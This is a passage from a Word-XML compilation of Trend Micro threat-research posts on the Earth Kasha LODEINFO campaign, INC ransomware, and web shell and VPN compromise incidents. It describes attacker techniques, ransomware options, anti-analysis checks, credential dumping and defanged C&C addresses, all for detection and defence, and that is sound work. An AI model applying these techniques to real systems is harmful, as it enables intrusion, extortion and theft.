        <w:t>A41APT Campaign LODEINFO Campaign #1 LODEINFO Campaign #2 Attribution Earth Tengshe Earth Kasha Earth Kasha Timeline 2020 - 2021 2019 - present 2023 - present Region Japan, Taiwan, Thailand, and the United States (but the main target is the entity in Japan) Japan Japan, Taiwan, and India Industry private sector, including electronics, energy, automotive, and defense industries public sector, individuals associated with international affairs, politicians and researchers in the academic sector - private sector, including manufacturing and aviation - Hi-tech related organizations - government agencies TTPs - Exploit public-facing application - DLL Side-Loading - MS13-098/CVE-2013-3900 to embed encrypted payload - Spear-phishing email - DLL Side-Loading - MS13-098/CVE-2013-3900 to embed encrypted payload - Exploit public- facing application - DLL Side-Loading - MS13-098/CVE-2013-3900 to embed encrypted payload Tools - SigLoader - HUI Loader - SodaMaster - P8Rat - FYAnti - Cobalt Strike - Jackpot - LODEINFO - NOOPDOOR - DOWNIISSA - Lilim RAT - MirrorStealer - LODEINFO - NOOPDOOR - Cobalt Strike - MirrorStealer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 Campaigns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Adding to these campaigns, we have observed a few other campaigns that slightly show some overlaps with the LODEINFO Campaign #2.</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Our first observation in 2023 shows that the Initial Access and Target methods resemble those of the LODEINFO Campaign #2. This unclustered campaign targeted mainly Japan and abused an exploitation against public- facing applications for Initial Access. Additionally, we confirmed that both campaigns used the same IPs as the origin of exploitation. On the other hand, we didn't observe any malware or hacking tools during this unclustered campaign. The adversary employed LOLBins in Post-Exploitation, not malware.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30. Infrastructure overlap with the unclustered campaign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Furthermore, Volt Typhoon, which is a state-sponsored actor based in China documented by Microsoft, was reportedly carrying out the exploit against FortiOS/FortiProxy (CVE-2023-27997), which was also used in the LODEINFO Campaign #2 in 2023. However, TTPs and toolsets in Post-Exploitation were totally different between Volt Typhoon and Earth Kasha (instead, the previously mentioned unclustered campaign looks similar, but no commonalities have been confirmed so far). The vulnerability of CVE-2023- 27997 was 0-day at the time of usage in both campaigns by Volt Typhoon and Earth Kasha, leading us to the assumption that the 0-day vulnerability was possibly shared or there might be a third-party entity, such as access brokers, specialized in facilitating Initial Access. This is not the only case indicating the possibility of 0-day vulnerability sharing.</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LAC reported the multiple campaigns, abusing Array AG (CVE-2023-28461) and Citrix (CVE-2023-3466, CVE-2023-3467, CVE-2023-3519), which were abused in the LODEINFO Campaign #2 in 2023 as well. Besides the vulnerabilities, however, there are no overlaps in malware and TTPs in Post-Exploitation between the LODEINFO Campaign #2 and these campaigns. This case suggests the possibility of 0-day sharing or the presence of an access broker, indicating that Earth Kasha may be part of such an ecosystem. Trend Micro Vision One Threat Intelligence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 stay ahead of evolving threats, Trend Micro customers can access a range of Intelligence Reports and Threat Insights within Trend Micro Vision One. Threat Insights helps customers stay ahead of cyber threats before they happen and better prepared for emerging threats. It offers comprehensive information on threat actors, their malicious activities, and the techniques they use. By leveraging this intelligence, customers can proactively protect their environments, mitigate risks, and respond effectively to threats.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 Micro Vision One Intelligence Reports App [IOC Sweeping] Spot the difference: Earth Kasha's new LODEINFO campaign and the correlation analysis with the APT10 umbrella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 Micro Vision One Threat Insights App Threat Actors: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Earth Kasha Earth Tengshe Emerging Threats: Spot the difference: Earth Kasha's new LODEINFO campaign and the correlation analysis with the APT10 umbrella Hunting Queries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 Micro Vision One Search App</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 Micro Vision Once Customers can use the Search App to match or hunt the malicious indicators mentioned in this blog post with data in their environment.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Malware Detection Associated with Earth Kasha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eventName:MALWARE_DETECTION AND malName:(*NOOPLDR* OR *NOOPDOOR* OR *LODEINFO*)</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hunting queries are available for Vision One customers withThreat Insights Entitlement enabled. Conclusion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 have revealed the new campaign by Earth Kasha and provided an in-depth analysis of LODEINFO, NOOPDOOR and other malware. Additionally, we have analyzed several campaigns in the past and present, suggesting a connection with the previous LODEINFO campaign (LODEINFO Campaign #1) and interesting overlaps with the A41APT Campaign by Earth Tengshe, which is also believed to belong to APT10 Umbrella. These findings lead us to conclude that the same group that conducted the previous LODEINFO campaign also conducted the recent LODEINFO campaign (LODEINFO Campaign #2) with significant TTPs updates. The group may be incorporating or sharing TTPs and tools with Earth Tengshe. Furthermore, our correlational analysis of several campaigns, including the ones by the Volt Typhoon and other unclustered groups, suggested that the 0-day vulnerabilities may be shared among China- nexus actors, or there may be third-party access brokers.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Our research on the recent activity by Earth Kasha highlighted the current complex situation and potential cooperative relationships among China-nexus threat actors. Such a situation will likely continue because it's beneficial for the adversaries on effective operation and hard for threat intelligence analysts on the attribution. We all need to understand the current complex background and carefully work on the attribution process.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Appendix A: Checked Applications for Anti-Analysis by NOOPDOOR x32dbg* * .exe x64dbg* * .exe llydbg* * .exe windbg* * .exe ida*.exe idaq*.exe ImmunityDebugger*.exe ProcessHacker*.exe Stud_PE*.exe pexplorer*.exe Autoruns*.exe procexp*.exe Procmon*.exe Tcpview*.exe 010Editor*.exe WinHex*.exe Wireshark*.exe zenmap*.exe ProcessHacker*.exe vmmap*.exe load_sc*.exe HttpAnalyzerStd*.exe Fiddler*.exe Appendix B: Indicator of Compromise (IoCs)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indicators of compromise can be found here:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00093949" w:rsidRDefault="00093949" w:rsidP="00093949">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Trend Micro 2024.11.19 12:07</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://www.trendmicro.com/en_us/research/24/k/lodeinfo-campaign-of-earth-kasha.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00093949" w:rsidRDefault="00093949" w:rsidP="00093949">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Ransomware Spotlight: INC</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October 29, 2024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X</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INC</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Trend Research</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INC ransomware has been observed to exploit CVE-2023-3519 and uses HackTool.Win32.ProcTerminator.A for defense evasion and HackTool.PS1.VeeamCreds for credential access in its different attack chains.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infographic of "Ransomware Spotlight: INC"</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INC ransomware positions its double extortion scheme in the guise of "safeguarding the reputation" of its victims to pressure them into paying a ransom. They employ two leak sites: the first requires log in credentials that the group provides its victims with the site acting as a means of communication, while the second is a publicly accessible site that contains leaked data. It was first detected in July 2023, where Trend Micro tracked the intrusion set as Water Anito. An update in December of that same year released a Linux version of the ransomware binary. In March 2024, another version of its Windows variant was released. In July, the Lynx ransomware group, with an intrusion set tracked by Trend Micro as Water Lalawag, allegedly bought source code from the gang behind the INC ransomware, but these claims have yet to be proven.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organizations need to know about INC ransomware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INC ransomware target network devices via spear-phishing scams and exploiting vulnerabilities to gain a foothold on enterprise networks. In November 2023, threat actors behind the group leveraged Netscaler ADC (Citrix ADC) and Netscaler Gateway (Citrix Gateway) and exploited CVE-2023- 3519 to gain initial access to its victims' systems. Among the victims claimed by the group during this time included Yamaha Motor's Philippines motorcycle manufacturing subsidiary; 37GB worth of the enterprise's allegedly stolen data containing employee identification information, back- up files, and corporate and sales information, among others, were added to the INC's leak site.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ransomware group has also been observed using HackTool.Win32.ProcTerminator.A for defense evasion and HackTool.PS1.VeeamCreds for credential access, additional tools in their arsenal to move laterally within victim networks.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Infection chain and techniques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 The INC ransomware observed infection chain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2. The INC ransomware also exploits CVE-2023-3519 and employs new tools in executing its attack.</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Initial Access INC ransomware usespurchased valid account credentials typically acquired through Initial Access Brokers. The group also targets victims via phishing in its early attacks. In November 2023, they have been observed to exploit the Citrix NetScaler vulnerabilityCVE-2023-3519 in an attack to gain initial access onto the victim's network device.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Defense Evasion The INC ransomware uses HackTool.ProcTerminator and ProcessHacker to evade detection.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>New samples from the group reveal that the gang is employing a new tool to terminate processes running in their victim's system; among those tasks observed notably is specifically terminating TrendMicro-related processes and services.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Credential Access Recent samples of INC ransomware also reveal new tools used to dump credentials from Veeam Backup and Replications Managers.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Discovery The INC ransomware uses NetScan and Advance IP scanner to collect network information that later could be used in lateral movement.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>It has also been observed to use legitimate tools such as Notepad, Wordpad, and Paint to view files.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>It also downloads from an open directory tools for lateral movement such as Mimikatz and AdvanceIPScanner.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Lateral Movement The INC Ransomware uses PSexec, AnyDesk, and TightVNC to move through its victim's system.</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Impact The ransomware uses 7-Zip to archive data before exfiltration using MegaSync.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>INC ransomware also uses AES algorithm for its file encryption and has two encryption modes: its fast encryption encrypts at a fixed value of 1,000,000 bytes and skips larger bytes of data, while its medium encryption encrypts at a fixed value of 1,000,000 bytes and skips smaller bytes of information.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3. A sample ransom note dropped by INC ransomware after successful data encryption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Additional information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December 2023, the INC ransomware dropped a Linux version while new versions of the first samples have been detected in March 2024. In the following table is a comparison of the command-line arguments across observed versions of INC ransomware.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Early Windows versionLinuxLatest Windows versionDescription --debug --debug --debug The print debugging logs of the sample to the terminal --file --file --file Specifies a file to be encrypted --dir --dir --dir The path to encrypt Does not exis --daemon Does not exist Daemonize the current sample Does not exis --motd Does not exist Modifies message of the day Does not exis --skip Does not exist Skips killing of VM's --sup Does not exist --sup Stops using processes --ens Does not exist --ens Encrypts network shares --lhd Does not exist --lhd Encrypts hidden boot and recovery volumes Does not exist Does not exist --mode Chooses mode for file encryption (fast, medium, slow) Does not exist Does not exist --hide Hides console window Does not exist Does not exist --safe-mode Kills process/services by mask Does not exist Does not exist --help Displays the arguments Does not exist Does not exist --kill Boots the victim's machine into safemode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MITRE tactics and techniques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PersistenceDefense EvasionDiscoveryImpact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T1543 - Create or Modify System Process The INC ransomware adds the following services to enable automatic execution in safe mode: o Name: dmksvc o Start Type: AutoStart o Binary Path: {Malware File Path}\{Malware Filename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INC ransomware's Linux variant appends the "-daemon" command, allowing the sample to detach from its parent process to become a parent process of its own (This line of code might suggest that the threat actor will use a SSH connection to the victim in order to execute the sample).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T1562.009 - Impair Defenses: Safe Mode Boot The INC ransomware has the capability to boot the machine in safe mode using '--safe-mode' parameter.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T1070 - Indicator Removal The INC ransomware empties recycle bin.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T1057 - Process Discovery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terminates the following processes: o sql o veeam o backup o exchange o Java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T1486 - Data Encrypted for Impact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INC ransomware avoids the following files for encryption with the following file extension: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 .msi o .exe o .dll o .inc</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New samples of INC ransomware avoid the following files for encryption with the following file extension: o .exe o .msi o .dll o .inc</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INC ransomware avoids the following folders that contains the following strings in their file path:</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 Windows o Program files o Program files (x86) o $RECYCLE.BIN o Appdata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Its newer samples avoid the following folders that contains the following strings in their file path:</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 Windows o Program files o Program files (x86) o $RECYCLE.BIN o Appdata o Microsoft SQL server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INC ransomware appends the .inc following file extension to its encrypted files.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INC ransomware drops ransomware note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 INC-README.txt o INC-README.html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New samples of INC ransomware append the following file extension to its encrypted files: {original file name}.{original extension}.INC</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New samples of the INC ransomware drops the following ransom notes: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 {Encrypted Directory}\INC-README.txt o {Encrypted Directory}\INC-README.html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 accelerate encryption, earlier versions of INC ransomware employ partial encryption combined with a multi-threading approach. The ransomware generates random key for the file encryption and the API, CryptGenRandom using the following Strings as parameters.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INC ransomware uses AES algorithm for its file encryption. It encrypts all drives including mounted drives and will then send the ransomware note to all the printers in the network and print them.</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New samples of the INC ransomware still use the following encryption method from earlier versions. The INC ransomware employs partial encryption combined with a multi-threading approach. It generates a random key for file encryptionusing the API CrypGenRandom with the following parameters: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 Uses AES algorithm for its file encryption.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>o It three encryption modes: fast (encrypts at a fixed value of 1,000,000 bytes and skips a larger bytes), medium (encrypts at a fixed value of 1,000,000 bytes and skips a smaller bytes), and slow (encrypts the whole file)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will then send the ransomware note to all the printers in the network and print them.</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T1490 - Inhibit System Recovery The INC ransomware attempts to delete shadow copies in the system.</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T1491.001 - Internal Defacement The INC ransomware changes the desktop wallpaper of the victim machine to a note declaring that information on the machine has been seized and compromised. Summary of malware, tools, and exploits used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Security teams can watch out for the presence of the following malware tools and exploits that are typically used in LockBit attacks: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Initial AccessLateral movementDiscoveryExfiltrationDefense EvasionCredential dumpingCollectionImpact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Compromised accounts CVE-2023-3519 PsExec AnyDesk NetScan Advance IP Scanner Mimikatz MegaSync HackTool.Win32.ProcTerminator.A HackTool.PS1.VeeamCreds.A Mimikatz 7-Zip INC ransomware Top affected countries and industries from Trend Micro threat intelligence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Based on Trend threat intelligence data, there were at least 325 attack attempts by the INC ransomware from October 2023 to August 2024. The INC ransomware group was most active in December 2023, with 124 attack attempts detected in Trend Micro environments. The gang took a breather for the first quarter of 2024, but is increasingly active as the year progresses.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4. A monthly breakdown of INC ransomware attack attempts based on Trend Micro threat intelligence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many customers chose not to specify the industry in which they belong, data from those who did reveal that the INC ransomware group targeted healthcare organizations the most.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5. A breakdown of industries targeted by the INC ransomware group based on Trend Micro threat intelligence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INC ransomware group targeted enterprises in the United States the most, followed by Malaysia and the Philippines. It also targeted Switzerland, Australia, and Ireland. Countries that did not make into the top 10 targeted by the gang include Austria, Germany, Thailand, South Korea, and France.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6. The top 10 breakdown of countries targeted by the INC ransomware group based on Trend Micro threat intelligence</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00093949" w:rsidRDefault="00093949" w:rsidP="00093949">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Trend Micro 2024.10.29 09:08</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-inc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00093949" w:rsidRDefault="00093949" w:rsidP="00093949">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Understanding the Initial Stages of Web Shell and VPN Threats: An MXDR Analysis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cyberattacks that employ web shells and VPN compromise are not particularly novel, they are still prevalent. The recent incidents that Trend Micro MXDR analyzed highlight the importance of behavioral analysis and anomaly detection in security measures.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Ryan Maglaque October 24, 2024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Subscribe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Key insights and takeaways: Attackers are increasingly using a layered fallback strategy by deploying multiple tools, such as web shells, tunneling software, and remote access applications.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Trend Micro MXDR analysis reveal the threats' multistep approach to ensure they maintain access even if one entry point is detected and blocked. Web shells give attackers interactive access to compromised servers, allowing them to conduct malicious activities while also enabling them to adapt their tactics quickly.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>By compromising VPN accounts, attackers can blend into the network. They avoid detection by masquerading malware and malicious activities as legitimate-looking processes.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>With MXDR and digital forensics and incident response capabilities, companies can have the actionable threat intelligence that could help their cybersecurity team detect early signs of compromise, proactively identify abnormal behaviors, and better initiate containment and recovery.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Today's evolving cyberthreats demand constant vigilance from organizations. Take for example two notable cybersecurity incidents we've observed, using novel twists on well-known techniques: a web shell attack and a VPN compromise. By scrutinizing their logs in Vision One during our containment and subsequent analysis of the incidents, we could unravel how these threats originated and escalated as well as what their next moves could have been.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From our own managed extended detection and response (MXDR) team, we break down these incidents and provide insights that can help improve the cybersecurity and incident response strategies of other organizations. MXDR case 1: A persistent web shell attack</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Web servers, often publicly accessible, are common targets for attackers looking to exploit vulnerabilities, misconfigurations, or unpatched software. Once compromised, they can be used to install malware, steal data, or launch further attacks such as cyberespionage.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One common method used to compromise web servers is by deploying malicious web shells. These malicious tools can be placed on a public-facing server by exploiting vulnerabilities or abusing file upload functions. Once the malicious web shell is installed, it creates an entry point for remotely executing commands. These include installing malware, launching additional attacks, stealing data, or using the server as a springboard to target other machines on the network.</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this incident, we've observed the following attack chain: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Initial access: The threat actor uploaded the web shell file in the server, which would later deploy a command via Internet Information Services IIS worker (w3wp.exe). An earlier upload of the web shell was found, but the threat did not proceed with the malicious activities at the time. Due to insufficient logs, we were unable to ascertain how these files were uploaded.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Execution: The files were introduced in the system under the IIS worker and were executed using cmd.exe.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Persistence: The threat actor created a local admin account. While the account was not used during the incident, there is evidence to assume that it would be used at a later time if not caught. Additionally, the threat also introduced a potential tunneling software named lcx5qm.jpg to allow access via Remote Desktop Protocol (RDP) from an external IP.</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Privilege escalation: The commands were run within the w3wp.exe instance, which operates with the same permissions as the process. Furthermore, a local admin account was created, which can be utilized for executing actions that require those privileges. A tool named zxin.jpg was dropped where the commands executed to it was ran under C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon, escalating its privileges.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Defense evasion: Several binary files dropped by the threat ended with file extension such as .jpg, typically done to appear as a benign file.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Discovery: Commands were executed using utilities built into Windows (e.g., set, reg.exe, whoami) to gather information regarding the host.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Command and control (C&amp;C): In one of the executed files, evidence of a potential C&amp;C server has been detected. The IP address 45[.]154[.]12 [.]246 was found within the arguments of the executed file lcx5qm.jpg. Another tool - fff.txt - was also introduced by the threat, which is a reverse proxy tool and was seen initiating outbound traffic toward 111[.]223 [.]247 [.]193.</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 Attack chain showing the high-level information of events and highlighting the tools used originating from the web shell incident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2. A timeline of the webshell attack, highlighting the chronological order of events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MXDR case 2: VPN compromise leading to lateral movement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A VPN account compromise occurs when a malicious actor gains access to a VPN account through methods such as phishing, exploiting vulnerabilities, or obtaining weak login credentials. Once inside, the attacker can perform </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>malicious activities using the compromised account, allowing them to blend into the network and evade security defenses. Depending on the level of access, they could move laterally to high-value systems and deploy additional payloads, such as ransomware.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incident we analyzed, we observed the following attack chain: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Initial access: Early activities showed login from a VPN IP originating from a workstation that conforms with the environment-naming convention of hosts. This might have helped the attacker blend in and avoid raising immediate suspicion.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Execution: The execution of Anydesk.exe, a third-party remote desktop application, on multiple hosts and usage of net.exe (a bult-in command utility in Windows used for network administration tasks) was observed.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Persistence: The threat actor deployed AnyDesk on the environment and created user accounts. Aside from AnyDesk, compromised accounts being added to the "Remote Desktop Users" group was also observed. This is to have remote desktop access on the environment.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Privilege escalation: The usage of the "net" command was observed in the environment that created new user accounts.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 Micro Deep Discovery Inspector (DDI) also detected network activity related to Impacket's SECRETSDUMP and WMIEXECPY, which are normally used to harvest password hashes of both local and domain accounts with the intention to elevate the access to the environment. Attempts to exploit CVE- 2020-1472, also known as the Zerologon privilege escalation vulnerability, were also observed in the host, but was not successful.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Defense evasion: The threat abused legitimate tools, such as anydesk.exe, to further strengthen its foothold in the environment. The threat also masquerading the tools by dropping them in the directories named "programdata" and "systemtest".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Credential access: There are activities that corroborate the use of Impacket's SECRETSDUMP and WMIEXECPY to harvest password hashes of both local and domain accounts.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Discovery: The threat used the tool netapp.exe, which is a copy of netscan.exe, to initiate the discovery of remote systems in the environment. The DDI logs also showed port scan activities focusing on ports 80, 139, 443, and 445.</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Lateral movement: Using the compromised accounts, RDP was utilized by the threat to move in other endpoints. Additionally, WMIExec was used to remotely execute commands.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C&amp;C: The misuse of Anydesk.exe was possibly for establishing command and control over the environment using compromised hosts.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3. Attack chain showing the events that transpired after a successful VPN account compromise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Key attack patterns and takeaways: Protecting against threats with a layered fallback strategy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both incidents, a major pain point was the lack of application logs (i.e., VPN and IIS logs). These logs are crucial, as they help in understanding how the threat entered and allow for more accurate security recommendations. Regular security audits also help identify signs of the threat's fallback mechanisms, such as unauthorized remote access or unusual tunneling activity.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Digital forensics and incident response (DFIR) analysis of both the incidents revealed critical insights into how attackers adapt and persist in networks. It's a reminder that simply blocking one entry point isn't enough. Organizations should ensure that logs are properly audited - this sounds easy, but is sometimes overlooked.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proactive cybersecurity strategy also involves comprehensive incident response planning. For example, identifying unusual process behavior (like a web server launching cmd.exe) or detecting unexpected VPN logins can serve as early indicators of compromise. Proactive DFIR not only aids in containment and recovery but also provides actionable intelligence to reinforce defenses. Capturing these threats early is crucial to prevent worst-case scenarios, such as the deployment of ransomware via web shells, as seen in similar attacks. In another incident, ransomware was deployed after a short dwell time following unauthorized access to a publicly exposed RDP host. Security considerations and recommendations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Implementing layered security, well-crafted incident response plans, and employee training is essential. Insights from DFIR analysis can help shape these strategies and improve the organizations' preparedness against evolving threats.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web shell threats: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Ensure proper input validation and sanitization. To prevent web shell attacks through code injection, implement strong input validation and sanitization in your web applications. Allow only specific characters, data formats, or ranges of values for input fields, filtering out any potentially dangerous code. Use server-side validation to block malicious scripts or commands that attackers might attempt to inject. Additionally, adopt secure coding practices and libraries or frameworks that guard against cross-site scripting (XSS), SQL injection, and other forms of injection attacks. Keep in mind that client-side validation alone is not sufficient, as attackers can easily bypass it.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Segment the network to limit lateral movement. Isolating web servers from the internal network minimizes interaction with sensitive internal assets and hinders attackers from moving laterally after a compromise. Use firewalls and access control lists (ACLs) to enforce strict communication rules between the web server network and internal network. Additionally, monitor traffic between these segments using intrusion detection systems (IDS) or intrusion prevention systems (IPS) to detect and respond to abnormal activity that might indicate an attempted breach.</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Keep the web application updated. Regularly apply security patches and updates to the IIS server, web applications, and any third-party plugins or modules. Outdated software is one of the most common vectors for web shell attacks, as attackers often exploit known vulnerabilities. Establish a routine patch management process to ensure that </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>security fixes are promptly applied. In cases where immediate patching is not possible, consider using virtual patching solutions to provide temporary protection against known exploits.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Restrict access and permissions on the IIS server. Implement strict access controls to limit who can modify files, directories, and server settings. Follow the principle of least privilege by granting only the necessary permissions to users and applications. For example, ensure that the IIS worker process (w3wp.exe) does not have write access to directories that could be used to deploy web shells. Use proper file system permissions and role-based access control to restrict modification capabilities. Regularly review and audit these permissions to identify and fix any potential misconfigurations that attackers might exploit.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Use a web application firewall (WAF) to filter traffic. Deploy a WAF in front of web servers to monitor and filter incoming HTTP/S traffic. A WAF can block known attack patterns, such as attempts to upload web shells, and filter out malicious requests. Configure the WAF with rulesets tailored to the company's applications and server environment. Enable logging and set up alerts for suspicious activities, like repeated file upload attempts or requests containing potentially malicious code. This proactive monitoring can quickly identify and mitigate threats before they escalate.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Disable unnecessary services and ports. Regularly review the web server configuration and disable any services, features, or ports that are not required for the application. For example, if the application does not use FTP, disable the FTP service on the IIS server. Reducing the number of running services minimizes the attack surface, limiting potential entry points for attackers. Additionally, periodically scan the servers for open ports to identify and close unnecessary ports that could be exploited to deploy web shells.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VPN compromise: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Reset credentials immediately. If a VPN account compromise is suspected, reset the credentials right away. Enforce a strong password policy. Where possible, implement multifactor authentication (MFA) for VPN access to add an extra layer of protection and reduce the risk of attackers regaining access using stolen credentials.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Monitor unusual account activities. Continuously monitor VPN usage for signs of compromise. Look for red flags like logins from unexpected locations, access outside normal working hours, or multiple failed login attempts. Pay attention to the sudden use or download of legitimate tools that attackers could abuse for malicious purposes, such as remote access software or network discovery tools. Collect and analyze data that could help flag suspicious behavior for further investigation.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fortifying cybersecurity defenses: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Enforce least privilege and system hardening. Always assign applications the minimum permissions they need to operate. Overly permissive roles, such as granting an application administrator-level privileges, open the door for attackers to exploit these roles for deeper system access. System hardening should include disabling unnecessary services, blocking access to sensitive system files, securing registry settings, and ensuring proper file permissions to prevent unauthorized modifications. Regularly audit permissions and configurations to identify and correct potential vulnerabilities.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Enable regular auditing and detailed logging. Activate comprehensive logging on the web server, including HTTP access logs, event logs, and error logs, to monitor server interactions. For IIS servers, configure features like to capture critical data, such as IP addresses, request headers, timestamps, and HTTP status codes. Implement centralized logging by forwarding logs to an MXDR solution for monitoring and correlation analysis. Ensure logs are stored securely with appropriate retention policies for post-incident analysis. Regularly audit these logs to identify abnormal behavior, including repeated failed login attempts, unauthorized access to critical directories, or unusual HTTP methods.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Maintain a robust patch management process. Ensure all applications, including the IIS server, web frameworks, and plugins are consistently updated with the latest security patches. Include a testing phase to validate that patches do not introduce new vulnerabilities or disrupt services. If immediate patching isn't feasible, consider virtual patching to block known exploits temporarily. Maintain an up-to-date inventory of all software versions running on the server to quickly identify components requiring patches.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Implement strong authentication. Employ MFA to secure access to the IIS server. Avoid using weak or default passwords and enforce a strict password policy. Implement account lockout mechanisms to prevent brute-force attacks. Restrict server access to known, trusted IP addresses or network segments. Monitor authentication logs for signs of anomalous login activities, such as logins from unexpected locations or attempts to bypass MFA.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 Micro provides comprehensive protection against these threats. Trend Cloud OneTM provides application control, integrity monitoring, and intrusion prevention, which protect server environments by preventing unauthorized applications from running, monitoring system integrity for unexpected changes, and detecting suspicious network traffic. These layers of defense are critical for mitigating risks posed by web shells and VPN compromise.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Indicators of Compromise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full list of IOCs can be found here</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00093949" w:rsidRDefault="00093949" w:rsidP="00093949">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Trend Micro 2024.10.24 12:08</w:t>
      </w:r>
      <w:r>
        <w:rPr>
